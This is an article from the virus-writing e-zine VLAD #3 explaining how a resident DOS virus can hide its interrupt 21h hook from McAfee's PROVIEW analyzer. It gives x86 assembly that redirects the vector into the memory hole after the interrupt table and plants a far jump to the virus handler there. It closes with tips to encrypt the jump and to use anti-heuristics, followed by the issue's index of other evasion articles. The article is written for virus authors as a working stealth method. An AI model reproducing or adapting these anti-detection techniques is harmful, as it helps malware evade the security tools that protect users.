Virus Labs & Distribution
VLAD #3 - Proview


                    
                    T R I C K I N G   P R O V I E W
                               Written by
                              Darkman/VLAD

------------
Introduction
------------

  This document is an example of how to trick PROVIEW, by changing the
address of interrupt 21h and point it to the hole in the memory, after the
interrupt table. In the memory hole we create a jump to the virus code and
the virus code will return to the original interrupt 21h.

-----------
Information
-----------

  Analysing the interrupt vectors with PROVIEW, would usually look something
like this:

No T Interrupt Name                 Address    Points to
21  DOS Function call              0021:40F8  DOS CODE

  When a virus is resident, the analysis of the interrupt vectors with
PROVIEW, will usual look something like this:

No T Interrupt Name                 Address    Points to
21  DOS Function call              9FC8:0062  !!! Unknown !!!

  When a virus, which tricks PROVIEW, is resident, the analysis of the
interrupt vectors with PROVIEW, will look like this:

No T Interrupt Name                 Address    Points to
21  DOS Function call              001E:0000  Interrupt Vector Table

-------------------------------
McAfee Associates about PROVIEW
-------------------------------

     PROVIEW (tm) Integrated System Analyzer and Viewer
       Copyright (C) 1992 - 1993 by McAfee Associates
                    All rights reserved


     PROVIEW is a menu driven program used to analyze, view
     and edit the basic components of a system, including the
     system memory, system interrupts, device drivers, and
     installed disk drive sectors and file contents.  PROVIEW 
     will allow you to view system elements in HEX, ASCII or 
     disassembled code format.  Full searching and editing 
     functions are included.


     Interrupts

          View/Edit the System Interrupt Vectors.  Proview 
          indicates which ones are currently in use, their
          memory addresses, owners and interrupt chains. 
          You may display/edit the actual interrupt code in 
          hex or ASM format.

--------------------
How to trick PROVIEW
--------------------

The below steps must be followed to trick PROVIEW:

  1. Load and store address of interrupt 21h.
  2. Create a jump far in the memory hole.

---------------------------------------
Load and store address of interrupt 21h
---------------------------------------

  The below code shows a example of how to load and store the address of
interrupt 21h:

;------------------------------------------------------------=< cut here >=-
             xor     ax,ax               ; Clear AX
             mov     ds,ax               ; DS = segment of interrupt table
             xchg    ax,ds:[21h*04h]     ; Load and store offset of INT 21h
             mov     es:[int21off],ax    ; Store offset of INT 21h
             mov     ax,1eh              ; AX = segment of hole in memory
             xchg    ax,ds:[21h*04h+02h] ; Load and store segment of INT 21h
             mov     es:[int21seg],ax    ; Store segment of INT 21h
;------------------------------------------------------------=< cut here >=-

  This code presumes that two variables of a word called int21off and
int21seg exists.

------------------------------------
Create a jump far in the memory hole
------------------------------------

  The below code shows a example of how to create a jump far in the
memory hole:

;------------------------------------------------------------=< cut here >=-
             mov     byte ptr ds:[1e0h],0eah
             mov     word ptr ds:[1e1h],offset virusint21
             mov     ds:[1e3h],es        ; Store segment of virusint21
;------------------------------------------------------------=< cut here >=-

  This code presumes that a procedure called virusint21 exists.

----------------------------------------------------
Necessary labels, variables and code to the examples
----------------------------------------------------

  The above examples presumes that two variables of a word called int21off
and int21seg exists. These variables holds the address of the original
interrupt 21h.

  The above examples presumes that a procedure called virusint21 exists. This
procedure is interrupt 21h of the virus.

---------------------
Final tips and tricks
---------------------

- Encrypt the jump far in the memory hole, then PROVIEW can't disassemble
  it.
- Use a lot anti-heuristic's, so other programs can't find the virus either.
- Remember to optimize your code.

- VLAD #3 INDEX -

ARTICLE.1_1      

Introduction
ARTICLE.1_2       Aims and Policies
ARTICLE.1_3       Greets
ARTICLE.1_4       Members/Joining
ARTICLE.1_5       Dist/Contact Info
ARTICLE.1_6       Hidden Area Info
ARTICLE.1_7       Coding the Mag

ARTICLE.2_1      

The Press
ARTICLE.2_2       Fooling TBScan
ARTICLE.2_3       Backdoors
ARTICLE.2_4       Tracing Int21
ARTICLE.2_5       Replication
ARTICLE.2_6       VSUM denial
ARTICLE.2_7       Proview

ARTICLE.3_1      

TBTSR Checking
ARTICLE.3_2       TBScan Flags
ARTICLE.3_3       HD Port Reading
ARTICLE.3_4       HD Port Writing
ARTICLE.3_5       TBAV Monitor
ARTICLE.3_6       Micro128 Disasm
ARTICLE.3_7       Aust403 Disasm

ARTICLE.4_1      

Virus Descriptions
ARTICLE.4_2       Hemlock
ARTICLE.4_3       Antipode
ARTICLE.4_4       Insert
ARTICLE.4_5       VLAD-DIR
ARTICLE.4_6       Quantum Magick
ARTICLE.4_7       Mon Ami La Pendule

ARTICLE.5_1      

Monkeys
ARTICLE.5_2       Small Virus
ARTICLE.5_3       Catch-22
ARTICLE.5_4       ART Engine
ARTICLE.5_5       Megastealth
ARTICLE.5_6       Virus Scripts
ARTICLE.5_7       What's Next ?

About VLAD - Links - Contact Us - Main